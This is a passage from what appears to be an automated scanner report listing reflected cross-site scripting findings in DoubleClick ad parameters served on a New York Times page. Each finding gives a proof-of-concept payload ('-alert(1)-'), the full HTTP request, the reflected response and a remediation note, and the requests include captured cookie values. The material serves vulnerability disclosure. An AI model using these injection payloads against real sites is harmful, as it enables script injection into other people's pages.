Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook996c3"-alert(1)-"92317d430a2&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/commu
...[SNIP]...

4.63. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3f05'-alert(1)-'f00d86fef5b was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbooke3f05'-alert(1)-'f00d86fef5b&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbooke3f05'-alert(1)-'f00d86fef5b&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/commu
...[SNIP]...

4.64. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c19"-alert(1)-"574e3fb75c9 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd28c19"-alert(1)-"574e3fb75c9&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd28c19"-alert(1)-"574e3fb75c9&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel
...[SNIP]...

4.65. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ae75'-alert(1)-'db690faebc3 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd7ae75'-alert(1)-'db690faebc3&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd7ae75'-alert(1)-'db690faebc3&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel
...[SNIP]...

4.66. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cd16'-alert(1)-'78a5aad6cc9 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b42cd16'-alert(1)-'78a5aad6cc9&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
o&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b42cd16'-alert(1)-'78a5aad6cc9&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.67. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d645f"-alert(1)-"28e168298f6 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4d645f"-alert(1)-"28e168298f6&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
o&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4d645f"-alert(1)-"28e168298f6&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

4.68. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cb77"-alert(1)-"c68a3f4ad51 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a63713991cb77"-alert(1)-"c68a3f4ad51&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a63713991cb77"-alert(1)-"c68a3f4ad51&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802
...[SNIP]...

4.69. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb377'-alert(1)-'9e6b8a939e3 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399cb377'-alert(1)-'9e6b8a939e3&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399cb377'-alert(1)-'9e6b8a939e3&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802
...[SNIP]...

4.70. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3349f'-alert(1)-'d13d8baec0a was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick3349f'-alert(1)-'d13d8baec0a&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
s.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick3349f'-alert(1)-'d13d8baec0a&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.71. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51f8e"-alert(1)-"e3926989a12 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick51f8e"-alert(1)-"e3926989a12&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Tue May 03 10:42:15 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
s.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick51f8e"-alert(1)-"e3926989a12&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl
...[SNIP]...

4.72. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5364.nytimes/B5378238.14

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26706'-alert(1)-'78f402d040 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=130519866726706'-alert(1)-'78f402d040&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
